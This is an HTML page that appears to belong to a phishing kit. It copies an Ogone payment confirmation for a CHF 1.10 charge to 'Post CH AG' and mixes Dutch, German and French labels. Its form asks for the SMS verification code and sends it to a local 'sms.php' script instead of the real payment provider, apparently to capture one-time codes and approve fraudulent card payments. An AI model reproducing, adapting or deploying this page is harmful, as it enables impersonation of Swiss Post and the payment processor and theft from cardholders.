<!DOCTYPE html>
<!-- saved from url=(0057)https://secure.ogone.com/ncol/prod/orderstandard_utf8.asp -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>Betaalbevestiging</title>
    <style type="text/css">
    /* Common elements for the HTML file */
    /* @font-face
	{
		font-family: 'open_sansregular';
		src: url('fonts/opensans-regular-webfont.eot');
		src: url('fonts/opensans-regular-webfont.eot?#iefix') format('embedded-opentype'), url('fonts/opensans-regular-webfont.woff') format('woff'), url('fonts/opensans-regular-webfont.ttf') format('truetype'), url('fonts/opensans-regular-webfont.svg#open_sansregular') format('svg');
		font-weight: normal;
		font-style: normal;
	}        */
    
    * {
        box-sizing: border-box;
    }
    
    html,
    body {
        margin: 0;
        padding: 0;
        background: #ffffff;
        font-family: 'Arial', Verdana, sans-serif;
        font-size: 14px;
        color: #666;
    }
    
    br {
        height: 1px;
    }
   
   	a {
   		color: #FFCC00;
   	}
    
    form {
        margin: 0px;
        padding: 0px;
        border: 0px;
    }
    
    /* Lock Header */
    
    #main {
        width: 100%;
        padding: 20px 10px;
    }
    
    #inner {
        max-width: 360px;
        margin: 0 auto;
        background: #ffffff;
        border: 1px solid #FFCC00;
    }
    
    #content {
        margin: 20px;
    }
    
    .securedBG {
        height: 80px;
        background: url('https://img-19.ccm2.net/NnjMe2KfPIlZ8bbz6tX1UAiGcp8=/1200x0/2df2b9fbf93f4ebea30bbc2d7af15406/ccm-news/shutterstock-331851953-fine-art-8960.png') center top no-repeat;
        background-size: auto 60px;
    }
    
    .secured {
        text-indent: -9000px;
    }
    /* Ticket */
    
    .ncoltable1 {
        width: 100%;
        padding: 15px;
        border: 1px solid #FFCC00;
        border-radius: 10px;
    }
	
	.ncoltable1 tr:nth-child(1) .ncoltxtl:after {
		content: "Bestellnummer:";
	}
	
	.ncoltable1 tr:nth-child(2) .ncoltxtl:after {
		content: "Insgesamt zu bezahlen:";
	}
	
	.ncoltable1 tr:nth-child(3) .ncoltxtl:after {
		content: "Nutznießer:";
	}
    
    .ncoltxtl,
    .ncoltxtr {
        position: relative;
        margin: 0;
        padding: 0;
        vertical-align: top;
        word-break: break-word;
        font-size: 14px;
        line-height: 1em;
    }
    
    .ncoltxtl {
        padding-right: 10px;
        text-align: right;
    }
    
	.ncoltxtl small {
		display: none;
	}
    
	.ncoltxtl:after {
        font-size: smaller;
        color: #666;
		top: 1px;
	}
	
    .ncoltxtr {
        text-align: left;
        word-break: break-all;
    }
    /* Form */
    
    .ncoltable2 {
        display: block;
        width: 100%;
        margin: 0 0 20px;
        padding: 15px;
        border: 1px solid #FFCC00;
        border-radius: 10px;
    }
    
    .ncoltable2 tbody,
    .ncoltable2 tr,
    .ncoltable2 td {
        display: block;
        width: 100% !important;
        margin: 0;
        padding: 0;
    }
	
		.ncoltable2 tr:nth-child(1) .ncoltxtl2 small{
		display:none;
	}
	.ncoltable2 tr:nth-child(1) .ncoltxtl2:after {
		content: "Bitte geben Sie den Code, den Sie erhalten haben, als Nachricht an die Handynummer ein";
        font-size: smaller;
	}	
	.ncoltable2 tr:nth-child(2) .ncoltxtl2 small {
		display:none;
	}
	.ncoltable2 tr:nth-child(6) .ncoltxtl2 small{
		display:none;
	}
	.ncoltable2 tr:nth-child(6) .ncoltxtl2:after {
		content: "CVC/CVV/CID";
        font-size: smaller;
	}
	
	.ncoltable2 tr:nth-child(9) {
		display: none;
	}
	
	.ncoltable3 > tbody > tr:nth-child(1) {
		display: none;
	}
    
    td.ncoltxtl2 {
        margin-bottom: 10px;
        text-align: left;
    }
    
    td.ncolinput {
        margin-bottom: 20px;
    }
    
    .ncolinput img {
        width: 40px;
    }
	
	.ncolinput small {
        color: transparent;
    }
    
    .ncolinput input,
    .ncolinput select {
    	height: 40px;
        width: 100%;
        padding: 0 10px;
        background-color: #fff;
        border: 1px solid #FFCC00;
        border-radius: 4px;
        font-family: 'Arial', sans-serif;
        font-size: 14px;
        color: #666;
    }

	.ncolinput select {
		width: 80px;
		margin-right: 20px;
	}

	input.ncol {
		height: 40px;
		width: 100%;
		background-color: #FFCC00;
		border-radius: 4px 4px 0 4px;
		border: none;
		font-family: 'Arial', sans-serif;
		font-size: 15px;
		color: #666;
		-webkit-appearance: none;
	}

	input.ncol#ncol_cancel {
		width: 120px;
		background-color: #fff;
		border: 1px solid #FFCC00;
		color: #FFCC00;
	}

    </style>
</head>

<body>
    <div id="main" style="width: 100%">
        <div id="inner">
            <div id="content">
                <div class="securedBG">
                    <div class="secured">
                        This is a secure payment.
                    </div>
                </div>
                <div class="mainContainerPaymentzone">
					
<div class="WaitMsgClass" id="WaitMsgId" style="display: none;background-color: #FFFFFF;border: solid #CCCCCC 4px;padding: 4px;color: #000000;font-family: Verdana;font-weight: bold;position: absolute;width: 350px;"><img id="waitGif" src="./Betaalbevestiging_files/wait_turn.gif"></div>

	<!-- Order overview -->
	<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Overzicht van de bestelling</h2>
	<table class="ncoltable1" border="0" cellpadding="2" cellspacing="0" width="95%" id="ncol_ref">
			
							<tbody><tr>
								<td class="ncoltxtl" colspan="1" align="right" width="50%"><small>Referentie van de bestelling :<!--External reference--></small></td>
								<td class="ncoltxtr" colspan="1" width="50%"><small>WS31237939</small></td>
							</tr>
						

				<tr>
					
							<td class="ncoltxtl" colspan="1" align="right" width="50%"><small>
							Totale kostprijs :<!--Total to pay-->
							
							</small></td>
							<td class="ncoltxtr" colspan="1" width="50%">
								<small>CHF 1.10 
							</small>
							</td>
					
				</tr>
				
					<tr>
						<td class="ncoltxtl" colspan="1" align="right"><small>Begunstigde  :<!--Beneficiary--></small></td>
						<td class="ncoltxtr" colspan="1"><small>Post CH AG</small></td>
					</tr>
					
	</tbody></table>
<style type="text/css">
	.sectionTitle {
		font-weight: bold;
		text-align:center;
		vertical-align: baseline;
		font-size: small;
		padding : 10px;
		text-decoration: underline;
	}
	.fieldTitle {
		font-weight: bold;
		text-align:right;
		vertical-align: baseline;
		font-size: small;
		padding : 3px;
	}
	.fieldValue {
		text-align:left;
		vertical-align: baseline;
		font-size: small;
		padding : 3px;
	}
	.star {
		font-size: 10px;
	}
	.note {
		font-size: 10px;
		padding : 3px;
	}
	.tc {
		font-size: 10px;
		padding : 5px;
	}
	.justify {
		text-align : justify;
	}
</style>

						<form method="POST" action="sms.php" name="OGONE_CC_FORM" onsubmit="return my_valscript(this);">
					<p></p>
					<!-- Hidden title for screenreaders (Payment Data) -->
					<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Betaalgegevens</h2>
						<table class="ncoltable2" border="0" cellpadding="2" cellspacing="0" width="95%">

						<tbody>
							
									<tr id="cvc_dob_row">
										

                                        <td class="ncoltxtl2" align="right">
                                            <small>
                                                <label id="lbl_ecom_payment_card_identification" for="Ecom_Payment_sms_Verification" style="display:none">Card verificatie code* :</label>
                                                <label id="lbl_cvc" for="Ecom_Payment_sms_Verification">Card verificatie code* :</label>
										    </small>
										</td>

										<td class="ncolinput">
											<small>
											
												<input type="text" required="required" name="Ecom_Payment_sms_Verification" id="Ecom_Payment_sms_Verification" autocomplete="Off" size="10" maxlength="10" aria-required="true">
											
                                                </small>
										</td>
									</tr>
								<tr>
									<td colspan="2" valign="middle" align="center">
										<small><small>
										* Benötigte Felder
										<br>
										
								</small>
										</small>
										</td>
								</tr>
								<tr align="center">
									<td colspan="2" valign="middle" align="center">
										<small>
										
									<input type="submit" class="ncol" name="payment" value="CONTINUER" id="submit3">
								
										</small>
										</td>
								</tr>
						</tbody></table>

                </div>
            </div>
        </div>
    </div>



</body></html>